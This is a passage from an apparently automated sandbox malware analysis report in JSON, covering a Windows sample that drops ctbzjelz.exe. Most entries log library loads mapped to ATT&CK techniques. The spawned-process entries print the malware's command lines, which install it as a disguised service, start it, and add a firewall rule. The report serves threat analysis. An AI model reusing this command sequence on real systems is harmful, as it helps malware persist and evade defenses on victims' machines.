6da00000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75d50000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 75010000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 75110000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 77360000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720c0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 77280000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c9c0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 72720000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 77460000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 71a40000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 740c0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73440000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77d60000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73170000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75400000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 752c0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73430000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 77240000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71a50000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 6d230000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 758c0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77d60000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74f60000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003208)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004704)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004704)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004704)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004704)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00003260)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00003260)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003260)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003260)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003260)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003260)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004664)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004664)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004664)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004664)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004664)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004664)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002972)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002972)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHWFP.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004812)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004812)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002232)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002232)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002232)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002232)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00002232)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002232)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002232)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002232)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002232)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ctbzjelz.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ctbzjelz.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ctbzjelz.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"ctbzjelz.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77460000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77460000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77460000\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77460000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77460000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77460000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00004560) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00004560) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"ctbzjelz.exe\" (UID: 00000000-00002972) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"ctbzjelz.exe\" (UID: 00000000-00002972) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00004812) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00004812) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00002232) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00002232) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00004560)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ctbzjelz.exe\" %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00004704)\n Spawned process \"sc.exe\" with commandline \"create fbjtauwa binPath= \"%WINDIR%\\\\system32\\\\fbjtauwa\\\\ctbzjelz ...\" (UID: 00000000-00003260), Spawned process \"sc.exe\" with commandline \"description fbjtauwa \"wifi internet conection\"\" (UID: 00000000-00002984), Spawned process \"sc.exe\" with commandline \"start fbjtauwa\" (UID: 00000000-00004664), Spawned process \"ctbzjelz.exe\" with commandline \"/d\"C:\\\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f ...\" (UID: 00000000-00002972)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004812), Spawned process \"svchost.exe\" (UID: 00000000-00002232)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00004560)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ctbzjelz.exe\" %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00004704)\n Spawned process \"sc.exe\" with commandline \"create fbjtauwa binPath= \"%WINDIR%\\\\system32\\\\fbjtauwa\\\\ctbzjelz ...\" (UID: 00000000-00003260), Spawned process \"sc.exe\" with commandline \"description fbjtauwa \"wifi internet conection\"\" (UID: 00000000-00002984), Spawned process \"sc.exe\" with commandline \"start fbjtauwa\" (UID: 00000000-00004664), Spawned process \"ctbzjelz.exe\" with commandline \"/d\"C:\\\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f ...\" (UID: 00000000-00002972)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004812), Spawned process \"svchost.exe\" (UID: 00000000-00002232)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"ctbzjelz.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"ctbzjelz.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"ctbzjelz.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e946a@ADVAPI32.dll\"\n \"0e000f00703f946a@ADVAPI32.dll\"\n \"0e000f00cc3f946a@ADVAPI32.dll\"\n \"11001200b447946a@ADVAPI32.dll\"\n \"110012004848946a@ADVAPI32.dll\"\n \"120013008c48946a@ADVAPI32.dll\"\n \"12001300e448946a@ADVAPI32.dll\"\n \"14001500dc6f946a@ADVAPI32.dll\"\n \"14001500f46f946a@ADVAPI32.dll\"\n \"140015000c70946a@ADVAPI32.dll\"\n \"170018002470946a@ADVAPI32.dll\"\n \"0d000e003c70946a@ADVAPI32.dll\"\n \"110012004c70946a@ADVAPI32.dll\"\n \"110012006070946a@ADVAPI32.dll\"\n \"0d000e003449946a@SHELL32.dll\"\n \"0d000e00b049946a@SHELL32.dll\"\n \"0f001000a071946a@ADVAPI32.dll\"\n \"14001500e071946a@ADVAPI32.dll\"\n \"14001500f871946a@ADVAPI32.dll\"\n \"0c000d004072946a@ADVAPI32.dll\"\n \"0c000d005072946a@ADVAPI32.dll\"\n \"0e000f006072946a@ADVAPI32.dll\"\n \"0e000f007072946a@ADVAPI32.dll\"\n \"0b000c008072946a@ADVAPI32.dll\"\n \"18001900b874946a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": 